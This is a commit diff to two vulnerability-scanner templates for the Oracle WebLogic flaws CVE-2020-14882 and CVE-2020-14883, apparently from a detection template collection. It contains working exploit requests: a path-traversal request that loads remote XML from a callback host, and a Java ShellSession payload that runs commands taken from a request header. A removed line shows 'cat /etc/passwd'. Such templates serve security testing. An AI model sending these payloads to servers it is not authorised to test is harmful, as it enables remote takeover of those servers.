payload + matchers update (#4094)

2022-04-09 20:22:22 +05:30 · 2022-04-09 20:22:22 +05:30 · 2503c42816
parent 4bbcbbef68
commit 2503c42816
2 changed files with 35 additions and 23 deletions
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@ -1,35 +1,29 @@
 id: CVE-2020-14882

 info:
-  name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
+  name: Oracle Weblogic Pre-Auth Remote Command Execution
  author: dwisiswant0
  severity: critical
+  description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
  reference:
    - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
    - https://www.oracle.com/security-alerts/cpuoct2020.html
    - https://twitter.com/jas502n/status/1321416053050667009
    - https://youtu.be/JFVDOIL0YtA
    - https://github.com/jas502n/CVE-2020-14882#eg
-  description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
-  remediation: Apply the appropriate security update.
-  tags: cve,cve2020,oracle,rce,weblogic,oast
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2020-14882
+  tags: cve,cve2020,oracle,rce,weblogic,oast

 requests:
-  - raw:
-      - |
-        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=utf-8
-
-        _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}")
+  - method: GET
+    path:
+      - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"

    matchers-condition: and
    matchers:
-
      - type: word
        part: header
        words:
@ -39,4 +33,5 @@ requests:
        part: interactsh_protocol
        words:
          - "http"
+
 # Enhanced by mp on 2022/02/08
--- a/cves/2020/CVE-2020-14883.yaml
+++ b/cves/2020/CVE-2020-14883.yaml
@ -15,26 +15,43 @@ info:
  tags: cve,cve2020,oracle,rce,weblogic

 requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-      Test-Header: cat /etc/passwd
+  - raw:
+      - |
+        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        CMD: {{cmd}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept-Encoding: gzip, deflate

-    body: |
-      test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+
+    payloads:
+      cmd:
+        - id

    matchers-condition: and
    matchers:
+      - type: word
+        part: header
+        words:
+          - "ADMINCONSOLESESSION"

-      - type: regex
-        regex:
-          - "root:.*:0:0:"
+      - type: word
+        part: body
+        words:
+          - 'uid='
+          - 'gid='
+          - 'groups='
        condition: and

      - type: status
        status:
          - 200

+    extractors:
+      - type: regex
+        regex:
+          - "(u|g)id=.*"
+
 # Enhanced by mp on 2022/04/05